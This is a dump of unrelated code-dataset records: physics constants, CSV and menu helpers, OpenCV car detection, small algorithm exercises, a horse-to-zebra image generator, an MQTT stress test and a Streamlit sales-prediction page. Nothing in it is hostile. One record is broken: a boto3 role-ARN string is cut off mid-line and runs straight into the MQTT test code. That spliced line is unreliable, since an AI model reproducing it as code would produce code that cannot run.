fields.ForeignKey(StateResource,'state')\n class Meta:\n queryset=Persons.objects.all()\n resource_name = 'Persons'\n authorization= Authorization()\n always_return_data = True","repo_name":"digitalgreenorg/nrlm","sub_path":"exampleapp/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35259033519","text":"from math import pi\n\nG = 6.67384e-8 # gravitational const / cm^3/g/s^2\nc = 2.99792458e10 # speed of light / cm/s\nhP = 6.6260688e-27 # Planck's const / erg s\nhbar = hP/2/pi\nkB = 1.3806488e-16 # Boltzmann const / erg/K\nmH = 1.66053892e-24 # atomic mass unit / g\nme = 9.1093898e-28 # electron mass / g\nalphaEM = 1/137.0359895 # fine structure constant\nsigmaT = 8*pi/3*(alphaEM*hbar/me/c)**2 # Thomson cross section / cm^2\na_rad = pi**2/15*kB*(kB/hbar/c)**3 # radiation const / erg/cm^3/K^4\nstefan = a_rad*c/4 # Stefan-Boltzmann const / erg/cm^2/s/K^4\neV = 1.60217733e-12 # 1 electron volt / erg\nkeV = 1e3*eV\nMsun = 1.98892e33 # solar mass / g\nLEsun = 
4*pi*c*G*Msun*mH/sigmaT # Eddington luminosity / erg/s\nMEsun = LEsun/c**2\npc = 3.08567758e18 # 1 parsec / cm\n","repo_name":"tt-nakamura/BHAD","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"1065717362","text":"import os\nimport csv\n\n\ndef isnone(value, value2):\n \"\"\"Si la primera expresion distinta a None, retorna su valor,\n si es None, retorna el valor de la segunda expreson\n \"\"\"\n if value is None:\n return value2\n return value\n\n\ndef write_rs_to_csv(dict_var, file_name:str, append:bool):\n \"\"\"Escribe el contenido de una lista de Diccionarios a un archivo CSV\"\"\"\n\n if len(dict_var) == 0:\n return\n \n mode = 'w' if not append else 'a'\n \n if os.path.exists(file_name):\n if os.stat(file_name).st_size > 0:\n mode = 'a'\n append =True\n else:\n append = False\n mode = 'w'\n else:\n append = False\n mode = 'w'\n \n with open(file_name, mode, newline='') as f:\n w = csv.DictWriter(f, dict_var[0].keys(), delimiter=';')\n if not append:\n w.writeheader()\n \n for row in dict_var:\n w.writerow(row)\n\n\ndef write_list_to_file( lista, archivo):\n with open( archivo, 'w') as f:\n for item in lista:\n f.write(f'{item}\\n')\n\n\ndef menu(titulo: str, lista):\n \"\"\" Despliega un menú con los elementos de la lista entregada como parámetro.\n Se agrega el elemento \"Salir\" como último de la lista.\n Retorna:\n Indice de la lista que corresponde al elemento seleccionado\n -1 = Salir\n \"\"\"\n clear()\n if titulo != '':\n print(f'\\n{titulo}')\n else:\n print('\\n Menú\\n======')\n\n x: int = 0\n for elem in lista:\n print(f\"\\t{x+1:2} - {elem}\")\n x += 1\n print(f\"\\t{x+1:2} - Salir\")\n\n print(\"\")\n opcion_menu: int = 0\n while True:\n try:\n opcion_menu = int(input(\"Ingresa el número de tu Opción >> \"))\n\n if int(opcion_menu) >= 0 and int(opcion_menu) <= len(lista) + 1:\n break\n\n except ValueError:\n print(\"Ingrese sólo números\")\n\n if int(opcion_menu) == len(lista)+1:\n print(\"See you...\\n\")\n return -1\n else:\n return int(opcion_menu)-1\n\n\ndef menu2(titulo, prompt_salida, lista):\n \"\"\" Despliega un menú con los elementos de la lista entregada como parámetro.\n Se agrega el elemento \"Salir\" como último de la lista.\n Retorna:\n Indice de la lista que corresponde al elemento seleccionado\n -1 = Salir\n \"\"\"\n\n clear()\n if titulo != '':\n print(f'\\n{titulo}')\n else:\n print('\\n Menú\\n======')\n\n x: int = 0\n for elem in lista:\n print(f\"\\t{x+1:2} - {elem}\")\n x += 1\n print(f\"\\t{x+1:2} - {prompt_salida}\")\n \n print(\"\")\n opcion_menu: int = 0\n while True:\n try:\n opcion_menu = int(input(\"Ingresa el número de la Opción >> \"))\n\n if int(opcion_menu) >= 0 and int(opcion_menu) <= len(lista) + 1:\n break\n\n except ValueError:\n print(\"Ingrese sólo números\")\n\n if int(opcion_menu) == len(lista)+1:\n print(\"See you...\\n\")\n return -1\n else:\n return int(opcion_menu)-1\n\n\ndef clear():\n \"\"\"\n Limpiar pantalla de la consola\n \"\"\"\n if os.name == \"posix\":\n os.system(\"clear\")\n else:\n os.system(\"cls\")\n","repo_name":"CristianSolervicens/DataBaseDictionary","sub_path":"modules/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9753868519","text":"import cv2\n\n\n# img\nimg_file = 'car_img.png'\n# video = cv2.VideoCapture('car_video.mp4')\n# 
video = cv2.VideoCapture('car_video2.mp4')\nvideo = cv2.VideoCapture('car_video4.mp4')\n\n# pre-trained car classifier\nclassifier_file = 'car_detector.xml'\n\ncar_tracker = cv2.CascadeClassifier(classifier_file)\n\n# Run forever until car stops or something\nwhile True:\n    \n    # Read the current frame\n    (read_successful, frame) = video.read()\n\n    if read_successful:\n        \n        # Must convert to grayscale\n        grayscaled_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n        \n    else: \n        break\n    \n    # detect cars\n    cars = car_tracker.detectMultiScale(grayscaled_frame)\n    \n    # Draw rectangles around the cars\n    for (x,y,w,h) in cars:\n        cv2.rectangle(frame, ( x,y), (x+w, y+h), (0,0,255),2)\n\n    \n    # Display the image with the cars spotted\n    cv2.imshow('car Detector', frame)\n    \n    # don't autoclose (Wait here in the code and listen for a key press)\n    cv2.waitKey(1)\n\n# create opencv image\nimg = cv2.imread(img_file)\n\n# convert to grayscale \nblack_n_white = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n# track car classifier\ncar_tracker = cv2.CascadeClassifier(classifier_file)\n\n# detect cars => give coordinates\ncars = car_tracker.detectMultiScale(black_n_white)\n\n# Draw rectangles around the cars \nfor(x,y,w,h) in cars:\n    cv2.rectangle(img, (x,y), (x+w, y+h), (0,0,255), 2)\n\n# Display the image with the cars spotted\ncv2.imshow('programming', img)\n\n# don't autoclose ( wait here in the code and listen for a key press)\ncv2.waitKey()\n\nprint('Code completed')","repo_name":"yy-yoshioka/opencv_car_detection","sub_path":"Car_and_Pedestrian_Tracking.py","file_name":"Car_and_Pedestrian_Tracking.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"11253489803","text":"# mpgReadFromFile.py\n# A program that computes the fuel efficiency of a multi-leg journey from a \n# separate file. 
Assume info in the file is formatted correctly.\n\"\"\"Modify Programming Exercise 9 to get its input from a file.\"\"\"\n\ndef getFile():\n    # Get the file name\n    while True:\n        try:\n            infileName = input(\"\\nPlease enter your file name: \")\n        except (SyntaxError, NameError, TypeError, ValueError):\n            print(\"You have to enter a file name.\")\n            continue\n        break\n\n    return infileName\n\ndef readFile(infileName):\n    # Open the file\n    infile = open(infileName, \"r\")\n\n    legLength = []\n    legFuel = []\n\n    # Process each line of the input file to convert it to a list.\n    for i, line in enumerate(infile):\n        if i == 0:\n            legLength.append(float(line))\n            continue\n        info = line.split()\n        leg, fuel = float(info[0]), float(info[1])\n\n        legLength.append(leg)\n        legFuel.append(fuel)\n    \n    return legLength, legFuel\n    \ndef calcMPG(legLength, legFuel):\n    # Get and print the miles per gallon for each leg of the trip.\n    i = 0 # Accumulator variable for list\n    l = len(legLength)\n    for entry in legLength:\n        # Make sure the accumulator, i, is not out of the list's length\n        if i + 1 < l:\n            dist = legLength[i+1] - entry\n            fuel = legFuel[i]\n            mpg = dist / fuel\n\n            print(\"Leg {0}: The MPG for this {1} mile leg is {2:0.1f} mpg.\"\\\n                  .format(i+1, dist, mpg))\n\n            i += 1\n        else:\n            break\n    # Get and print the miles per gallon for the entire trip.\n    dist = legLength[-1] - legLength[0]\n    # Reset the fuel variable to sum the entire list.\n    fuel = 0\n    for entry in legFuel:\n        fuel = fuel + entry\n    mpg = dist / fuel\n\n    return dist, mpg\n\ndef main():\n\n    print(\"This program reads the distance and fuel used to calculate the fuel \\\nefficiency of the overall trip and each leg.\")\n\n    infileName = getFile()\n    # Get the odometer readings and fuel used.\n    legLength, legFuel = readFile(infileName)\n    # Calculate and print the leg distance and mpg\n    # Return the overall mpg and distance\n    dist, mpg = calcMPG(legLength, legFuel)\n    \n    print(\"The overall MPG for this {0} mile trip is {1:0.1f} mpg.\"\\\n          .format(dist, mpg))\n\nmain()\n","repo_name":"jeffvswanson/CodingPractice","sub_path":"Python/Zelle/Chapter8_LoopStructuresBooleans/ProgrammingExercises/10_FuelEfficiencyFromFile/mpgReadFromFile.py","file_name":"mpgReadFromFile.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"36249881630","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#Wersja optymalna \n\ndef nwd_v1(a, b):\n\n    while a != b:\n        if a > b:\n            a = a - b\n        else:\n            b = b - a\n    return a\n\ndef nwd_v2(a, b):\n    \n    while a > 0:\n        a = a % b\n        b = b - a\n    \n    return b\n    \ndef nwd_rek(a, b):\n    \n    if b == 0:\n        return a\n    return nwd_rek(b, a % b)\n    \ndef main(args):\n\n    a = int(input(\"Podaj liczbę\"))\n    b = int(input(\"Podaj liczbę\"))\n    assert nwd_rek(5, 10) == 5\n    assert nwd_rek(2, 5) == 1\n    assert nwd_rek(4, 10) == 2\n    print (\"NWD({:d}, {:d}) = {:d}\".format(a, b, nwd_rek(a, b)))\n    print(\"Największy spólny dzielnik \", nwd_rek(a, b))\n\n    return 0\n\n\nif __name__ == '__main__':\n    import sys\n    sys.exit(main(sys.argv))\n","repo_name":"Patrycja13/gitrepo","sub_path":"python/euklides.py","file_name":"euklides.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"43728536323","text":"import sys\ninput=sys.stdin.buffer.readline\nimport os\nfrom math import*\n\nt=int(input())\nwhile t:\n\tt-=1\n\ta,b,n,m=map(int,input().split())\n\tif 
(a+b)<(n+m):\n\t\tprint(\"No\")\n\telse:\n\t\tif m<=min(a,b):\n\t\t\tprint(\"Yes\")\n\t\telse:\n\t\t\tprint(\"No\")\n\n\n","repo_name":"abusaeed2433/AllCode","sub_path":"Python/a_cookie_for_you.py","file_name":"a_cookie_for_you.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"4952406763","text":"menu = [\r\n \"1. Normal Character Generator\",\r\n \"2. Advanded Appearance Generator\",\r\n]\r\n\r\nselected = 0\r\n\r\ndef display_menu(menu, selected):\r\n for number, item in enumerate(menu, 1):\r\n if number == selected:\r\n print('(X)', item)\r\n else:\r\n print('( )', item)\r\n\r\nwhile True:\r\n display_menu(menu, selected)\r\n\r\n try:\r\n # don't assign directly to `selected` because user may choose wrong number\r\n new_selection = int(input(\"Please choose one of the menu options.\\n\"))\r\n\r\n if new_selection in (1, 2):\r\n # assign to `selected` when user choose correct number\r\n selected = new_selection\r\n\r\n display_menu(menu, selected)\r\n \r\n new = input(\"Would you like to make another selection? [Y/n]\").lower()\r\n\r\n if new in (\"n\", \"no\"):\r\n break\r\n else:\r\n print(\"Invalid Choice. Enter one of the menu numbers.\")\r\n except ValueError:\r\n print(\"Invalid Choice. Enter one of the menu numbers.\")\r\n","repo_name":"Keenonthedaywalker/Oblivion-Random-Character-Genarator","sub_path":"Oblivion Random Character Geenrator/menuTest.py","file_name":"menuTest.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3848740110","text":"'''\n@Description: \n@Version: 1.0\n@Autor: Henggao\n@Date: 2020-02-20 18:31:50\n@LastEditors: Henggao\n@LastEditTime: 2020-02-21 13:28:12\n'''\n\nimport random\n\nn = random.randint(0, 100)\n\nuser_guess = int(input(\"input your guess : \"))\n\nif user_guess > n:\n print(\"try smaller\")\nelif user_guess < n:\n print(\"try bigger\")\nelse:\n print(\"Bingo ,you get it\")\n\nprint(n)","repo_name":"genghenggao/Project2020","sub_path":"PythonDemo2020/输入测试.py","file_name":"输入测试.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27789874755","text":"# Definition for a binary tree node.\nfrom typing import List\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n if not preorder or not inorder:\n return None\n left_node_cnt = inorder.index(preorder[0])\n root = TreeNode(preorder[0])\n root.left = self.buildTree(preorder[1:left_node_cnt + 1], inorder[:left_node_cnt])\n root.right = self.buildTree(preorder[left_node_cnt + 1:], inorder[left_node_cnt + 1:])\n return root\n\n\nif __name__ == '__main__':\n Solution().buildTree([3,9,20,15,7], [9,3,15,20,7])\n","repo_name":"mt3925/leetcode","sub_path":"Python/Construct_Binary_Tree_from_Preorder_and_Inorder_Traversal.py","file_name":"Construct_Binary_Tree_from_Preorder_and_Inorder_Traversal.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"72577055821","text":"import requests\nimport base64\nimport torch\n\nfrom torchvision import transforms\nfrom .resnet import ResNetGenerator\nfrom urllib.parse import urlparse\nfrom PIL 
import Image, UnidentifiedImageError\nfrom io import BytesIO\n\n\ndef prepare_model():\n \"\"\"\n function for prepare generative model\n return model and preprocess\n \"\"\"\n netG = ResNetGenerator()\n\n model_path = './app/utils/horse2zebra_0.4.0.pth'\n model_data = torch.load(model_path)\n netG.load_state_dict(model_data)\n\n netG.eval()\n\n preprocess = transforms.Compose([transforms.Resize(256), transforms.ToTensor()])\n\n return netG, preprocess\n\n\ndef img_to_bin(im):\n \"\"\"\n function for encode image ti binary\n return binary object\n \"\"\"\n buffered = BytesIO()\n im.save(buffered, format=\"PNG\")\n bin_im = base64.b64encode(buffered.getvalue())\n return bin_im\n\n\ndef generate_zebra_from_image(user_img):\n \"\"\"\n function for generate zebra from horse-tensor\n return image of zebra\n \"\"\"\n\n net_G, preprocess = prepare_model()\n\n img = Image.open(user_img)\n\n horse_img_bin = img_to_bin(img)\n\n img_t = preprocess(img)\n batch_t = torch.unsqueeze(img_t, 0)\n\n batch_out = net_G(batch_t)\n\n out_t = (batch_out.data.squeeze() + 1.0) / 2.0\n out_img = transforms.ToPILImage()(out_t)\n\n zebra_img_bin = img_to_bin(out_img)\n\n return zebra_img_bin, horse_img_bin\n\n\ndef generate_zebra_from_link(user_url):\n \"\"\"\n function for generate zebra from horse-tensor\n return image of zebra\n \"\"\"\n net_G, preprocess = prepare_model()\n\n response = requests.get(user_url)\n try:\n img = Image.open(BytesIO(response.content))\n except UnidentifiedImageError:\n print('Something went wrong ... Try another link, or upload an image from your local device')\n\n horse_img_bin = img_to_bin(img)\n\n img_t = preprocess(img)\n batch_t = torch.unsqueeze(img_t, 0)\n\n batch_out = net_G(batch_t)\n\n out_t = (batch_out.data.squeeze() + 1.0) / 2.0\n out_img = transforms.ToPILImage()(out_t)\n\n zebra_img_bin = img_to_bin(out_img)\n\n return zebra_img_bin, horse_img_bin\n\n\ndef validate_url(url):\n try:\n result = urlparse(url)\n if all([result.scheme, result.netloc]):\n return url\n elif not url:\n return False\n else:\n print(\"it doesn't look like a picture link\")\n return False\n except AttributeError:\n return False\n","repo_name":"dKosarevsky/web-dev","sub_path":"art-idiot/backend/app/utils/zebrate.py","file_name":"zebrate.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"36325362965","text":"import boto3\r\nimport json\r\nimport os\r\nif 'QUEUE_URL' in os.environ:\r\n QUEUE_URL = os.environ['QUEUE_URL']\r\nelse:\r\n raise Exception(\"Missing environment variable: QUEUE_URL\")\r\nROLE_ARNS=[\r\n \"arn:aws:iam:: interval:\n print('[end] mqtt_api_stress: MQTTClient,runtimes: %s;' % m)\n break\n if duration % 100 == 0:\n print('keep running... 
current duration: %sH,runtimes: %s;' % (duration/3600, m))\n try:\n c = MQTTClient(client_id, server, port=port, user=user, password=password, keepalive=keepalive, ssl=False,\n ssl_params={})\n c = MQTTClient(client_id, server, port=port, user=user, password=password, keepalive=keepalive, ssl=True,\n ssl_params={})\n utime.sleep(1)\n except Exception as e:\n print('runtimes:%s,MQTTClient:: %s||result_api:: False;' % (m,e))\n m += 1\n\n print('[start] mqtt_api_stress: MQTTClient&connect&disconnect;')\n start_time = utime.time()\n m = 1\n while 1:\n duration = utime.time() - start_time\n if duration > interval:\n print('[end] mqtt_api_stress: MQTTClient&connect&disconnect,runtimes: %s;' % m)\n break\n if duration % 100 == 0:\n print('keep running... current duration: %sH,runtimes: %s;' % (duration/3600, m))\n try:\n c.connect(clean_session=True)\n c.disconnect()\n c.connect(clean_session=False)\n c.disconnect()\n utime.sleep(1)\n except Exception as e:\n c.disconnect()\n print('runtimes:%s,connect&disconnect:: %s||result_api:: False;' % (m,e))\n m += 1\n\n print('[start] mqtt_api_stress: connect&subscribe&publish&disconnect;')\n start_time = utime.time()\n m = 1\n while 1:\n duration = utime.time() - start_time\n if duration > interval:\n print('[end] mqtt_api_stress: connect&subscribe&publish&disconnect,runtimes: %s;' % m)\n break\n if duration % 100 == 0:\n print('keep running... current duration: %sH,runtimes: %s;' % (duration/3600, m))\n try:\n c.connect(clean_session=False)\n c.subscribe(topic)\n c.publish(topic, msg)\n c.disconnect()\n c.connect(clean_session=True)\n c.subscribe(topic)\n c.publish(topic, msg)\n c.disconnect()\n except Exception as e:\n print('runtimes:%s,connect&subscribe&publish&disconnect:: %s||result_api:: False;' % (m,e))\n m += 1\n\n print('[start] mqtt_api_stress: set_callback&subscribe&publish&wait_msg;')\n start_time = utime.time()\n c.connect(clean_session=True)\n m = 1\n while 1:\n duration = utime.time() - start_time\n if duration > interval:\n print('[end] mqtt_api_stress: set_callback&subscribe&publish&wait_msg,runtimes: %s;' % m)\n break\n if duration % 100 == 0:\n print('keep running... current duration: %sH,runtimes: %s;' % (duration/3600, m))\n try:\n c.set_callback(sub_cb)\n c.subscribe(topic)\n c.publish(topic, msg)\n except Exception as e:\n print('runtimes:%s,set_callback&subscribe&publish&wait_msg:: %s||result_api:: False;' % (m,e))\n while True:\n # 等待服务器直到服务器无待处理消息,该函数是阻塞函数\n c.wait_msg()\n if state == 1:\n break\n else:\n print('runtimes:%s,wait_msg:: %s||result_api:: False;'% (m,state))\n m += 1\n c.disconnect()\n\n\nif __name__ == '__main__':\n api_stress()\n","repo_name":"learning-lte/quecpython-test-project","sub_path":"api_test_case/mqtt/mqtt_client_send_rev_stress.py","file_name":"mqtt_client_send_rev_stress.py","file_ext":"py","file_size_in_byte":6694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28073984489","text":"# 1. Crea una función para verificar si un número es par o impar y devuelva “El número es par” o “El número es impar” según corresponda.\n# ya Realizado\n\n# 2. Crea una función a la que pases un número como argumento, calcule el factorial de ese número y haga print del resultado.\n# Ya realizado\n\n# 3. Crea una función a la que se le pase un número como argumento, calcule la cantidad de dígitos y haga print de “La cantidad de dígitos es:” y el resultado total de dígitos.\n# PISTA: Para convertir un número a string usa el método str(). 
Te recordamos que para saber la longitud de una cadena utilizamos len()\n\na = input('Ingrese un numero para saber cuantos digitos tiene: ')\nprint(f'El número {a}, tiene {len(str(a))} digitos')\n\n# 4. Dada una lista de números, crea una función que devuelva el número máximo de la lista.\n\n\ndef busca_mayor(list):\n cont = 0\n for num in list:\n if num >= cont:\n cont = num\n print('El numero mayor es el: ', cont)\n\n\nLista = [2, 5, 6, 7, 8, 5, 4, 9, 5, 6, 2, 1, 3, 54, 4, 4, 2, 5, 6]\nbusca_mayor(Lista)\n\n\n# 5. Crea una función que, dado un número, sume los dígitos de ese número y devuelva el resultado.\n\ndef suma_numeros(cond1):\n sum = 0\n for contador in str(cond1):\n sum = sum + int(contador)\n print('La suma de los numeros introducidos es', sum)\n\n\nentrada = int(input('Ingrese un numero para que sus digitos sean sumados: '))\nsuma_numeros(entrada)\n\n# 6. Dados dos números, crea una función para encontrar el mínimo común múltiplo (MCM) de los dos números, que se les pasarán como argumento a la función, y devuelva el MCM.\n\n\ndef mcm(a, b):\n lista1 = []\n lista2 = []\n i = 1\n\n while True:\n lista1.append(str(a*i))\n lista2.append(str(b*i))\n for valores in lista2:\n if int(lista1[-1]) == int(valores):\n return int(valores)\n i += 1\n\n\nnum1 = int(input('Ingrese el primer numero: '))\nnum2 = int(input('Ingrese el segundo numero: '))\nprint(f'El Minimo común multiplo entre {num1} y {num2}, es :', mcm(num1, num2))\n\n# 7. Crea una función a la que, pasándole la base y la altura, calcule y devuelva el área de un triángulo.\n\n\ndef area_tri(num1, num2):\n area = int(0.5*num1*num2)\n return (print(f'El área del triangulo de base {num1} y altura {num2}, es: ', area))\n\n\nbase = int(input('Ingresa la base del triangulo: '))\naltura = int(input('ingresa la altura del triangulo: '))\narea_tri(base, altura)\n\n\n# 8. Crea una función que, dado un número, verifique si un número es positivo, negativo o cero.\n\ndef num_pnc(num):\n if num < 0:\n return (print('El numero es Negativo'))\n elif num > 0:\n return (print('El numero es Positivo'))\n elif num == 0:\n return (print('El numero es Cero'))\n\n\npnc = int(input('indique el numero para saber si positivo, negativo o cero: '))\nnum_pnc(pnc)\n\n\n# 9. Crea una función que, dada una palabra, cuente la cantidad de letras en una palabra.\n\ndef cuenta_palabra(pal):\n contador = 0\n for num in pal:\n contador += 1\n return (print(contador))\n\n\npalabra = input(\n 'escribe la palabra de la que quieres saber el numero de letras: ')\n\ncuenta_palabra(palabra)\n\n\n# 10. Crea una función que, dada una lista de números, convierta la lista de números a su valor absoluto.\n\ndef conversor_abs(lis):\n for contador in lis:\n lista_abs.append(abs(int(contador)))\n return (lista_abs)\n\n\nlista_num = []\nlista_abs = []\nwhile True:\n num = input('Inserte los numeros de la lista y finalice con \"fin\" ')\n if num == 'fin':\n break\n lista_num.append(num)\nprint(\n f'El valor absoluto de la lista {lista_num}, es: ', conversor_abs(lista_num))\n\n\n# 11. Crea una función que, dado un número, verifique si un número es primo.\n\n# ya Realizado\n\n# 12. 
Dados dos números, crea una función para encontrar el máximo común divisor (MCD) de esos dos números.\n\ndef mcd(num1, num2):\n def Mayor(a, b):\n if a > b:\n return (a)\n else:\n return (b)\n\n def Menor(b):\n if b < Mayor(num1, num2):\n return (b)\n else:\n return (num1)\n\n ma = Mayor(num1, num2)\n me = Menor(num2)\n\n while me != 0:\n # print(f' 1ro ma es:{ma}, y me es:{me}')\n resto = ma % me\n if me % resto != 0:\n # print(f' 2ro me es:{me}, y resto es:{resto}')\n ma = resto\n me = me % resto\n # print(f' 3ro ma es:{ma}, y me es:{me}')\n else:\n break\n return (resto)\n\n\nnum1 = int(input('pon el primer numero: '))\nnum2 = int(input('pon el segundo numero: '))\nprint('el Maximo Comun Dividor es: ', mcd(num1, num2))\n","repo_name":"jerc777/PreworkPython-Javier_Rivera_Cortes","sub_path":"Ejercicios/Ejercicios_funciones-bucles.py","file_name":"Ejercicios_funciones-bucles.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7253674923","text":"#Longest Common perfix\n#flower flow flee => 2\n#Idea:\n#sort() list\n#check first and last word how much they match\n######CODE#########\nclass Solution:\n def solve(self, words):\n words.sort()\n res=''\n for i in words[0]:\n if words[-1].startswith(res+i):\n res+=i\n else:\n break\n return res","repo_name":"nikhilc2710/funprojects","sub_path":"Algoscripts/longestcommonprefirx.py","file_name":"longestcommonprefirx.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"43498821083","text":"# ================================== Importando Librerias =============================\nfrom pages.Modelo_ import bosque\nfrom pages.Modelo_ import handle_outliers\nfrom pages.Modelo_ import analizar_y_eliminar_ruido\n\nimport pandas as pd\nimport streamlit as st\nimport plotly.graph_objects as go\nimport plotly.express as px\n\n# Título de la página\nst.title(\" :date: Predicciones\")\n## espacio en la parte superior de la pagina\nst.markdown('', unsafe_allow_html=True)\n\n# Dividir la página en dos columnas\ncol1, col2 = st.columns(2)\n\n# Componente para cargar un archivo Excel\nuploaded_file = st.file_uploader(\":file_folder: Cargar archivo Excel\", type=[\"xlsx\", \"xls\"])\n# ================================================ Cargar Datos ===========================================================\n# Leer el conjunto de datos por defecto\ndf = pd.read_excel(\"./data/Diclofenaco-prediccion.xlsx\", engine=\"openpyxl\")\n# Carga el archivo y crea un DataFrame si se ha cargado un archivo\nif uploaded_file is not None:\n filename = uploaded_file.name\n st.write(filename)\n\n try:\n new_df = pd.read_excel(uploaded_file, engine=\"openpyxl\")\n new_df.columns = df.columns\n # Verificar la consistencia de las columnas y tipos de datos\n # verifica si la cantidad de columnas no es la misma.\n if len(df.columns) != len(new_df.columns):\n st.error(\"Error: El archivo cargado no tiene la misma cantidad de columnas que el archivo por defecto.\")\n # verifica si los nombres de las columnas no son iguales.\n elif all(df.columns == new_df.columns):\n st.error(\"Error: El archivo cargado tiene nombres de columnas incorrectos. 
Corrigiendo...\")\n new_df.columns = df.columns\n df = new_df\n st.success(\"El archivo se ha cargado con éxito.\")\n # verifica si los tipos de datos de las columnas no son iguales.\n elif not df.dtypes.equals(new_df.dtypes):\n st.error(\"Error: El archivo cargado no tiene el mismo formato de datos que el archivo por defecto.\")\n else:\n # Guardar y actualizar el nuevo DataFrame\n new_df.to_excel(\"../data/Diclofenaco-prediccion.xlsx\", index=False)\n df = new_df\n st.success(\"El archivo se ha cargado con éxito.\")\n except Exception as e:\n st.error(f\"Error al cargar el archivo: {str(e)}\")\nelse:\n st.warning(\"Ningún archivo se ha cargado, se utilizará un archivo por defecto.\")\n\n# Aplicar la función para manejar outliers\ndf['PRODUCTOS ALMACENADOS'] = handle_outliers(df['PRODUCTOS ALMACENADOS'])\n\n# Hacer predicciones con el modelo entrenado\nnuevos_datos = df[['MES', 'PRODUCTOS ALMACENADOS', 'GASTO DE ALMACENAMIENTO', 'DEMANDA DEL PRODUCTO', 'FESTIVIDAD']] # Columnas relevantes para la predicción\npredicciones = bosque.predict(nuevos_datos) + 10\n\n\n# Crear un nuevo DataFrame con las predicciones\ndf_predicciones = pd.DataFrame({\"PRODUCTOS VENDIDOS\": predicciones})\n\n# Agregar la columna de predicciones al DataFrame original\ndf_con_predicciones = pd.concat([df, df_predicciones], axis=1)\n\n# Crear una tabla con Plotly que incluya la columna de predicciones con formato de 2 decimales\nfig_predicciones = go.Figure(data=[go.Table(\n header=dict(values=list(df_con_predicciones.columns), fill_color='darkslategray', line_color='white', align='center'),\n cells=dict(values=[df_con_predicciones[col] if col != 'PRODUCTOS VENDIDOS' else df_con_predicciones[col].apply(lambda x: f'{x:.2f}') for col in df_con_predicciones.columns], \n fill_color=['dimgray' if col != 'PRODUCTOS VENDIDOS' else 'steelblue' for col in df_con_predicciones.columns],\n line_color='white', align='center',\n format=[None if col != 'PRODUCTOS VENDIDOS' else ',.2f' for col in df_con_predicciones.columns])\n)])\n\n# Estilo adicional para la tabla\nfig_predicciones.update_layout(\n margin=dict(l=0, r=0, b=0, t=0),\n)\n\n# Dividir la página en dos columnas\ncol1, col2 = st.columns(2)\n\nwith col1:\n # Mostrar la tabla con predicciones debajo de los gráficos\n st.subheader(\"Cantidad de Productos que se Venderán:\")\n st.plotly_chart(fig_predicciones)\nwith col2:\n\n # Crear gráfico de dispersión entre Demanda del Producto y Productos Vendidos Predichos\n scatter_predicciones = px.scatter(df_con_predicciones, x='DEMANDA DEL PRODUCTO', y='PRODUCTOS VENDIDOS',\n title='Diagrama de Dispersión: Demanda del Producto vs Productos Vendidos',\n labels={'DEMANDA DEL PRODUCTO': 'DEMANDA DEL PRODUCTO', 'PRODUCTOS VENDIDOS': 'PRODUCTOS VENDIDOS'})\n # Mostrar el gráfico de dispersión\n st.plotly_chart(scatter_predicciones)\n\n# ------------------------ Realizar Predicciones ---------------------------\n# Dividir la página en dos columnas\nleft_column, right_column = st.columns(2)\n\n# Columna izquierda: Gráfico de dispersión\nwith left_column:\n left_column.header(\"Gráfico de Dispersión\")\n scatter_fig = px.scatter(df_con_predicciones, x=\"DEMANDA DEL PRODUCTO\", y=\"PRODUCTOS VENDIDOS\", title=\"Productos Almacenados vs Productos Vendidos\")\n left_column.plotly_chart(scatter_fig)\n\n# Columna derecha: Formulario para ingresar nuevos datos y botón de predicción\nwith right_column:\n st.header(\"Ingresar Datos para Predicción\")\n # Filtrar las variables que no son consideradas ruido\n variables_no_ruido = 
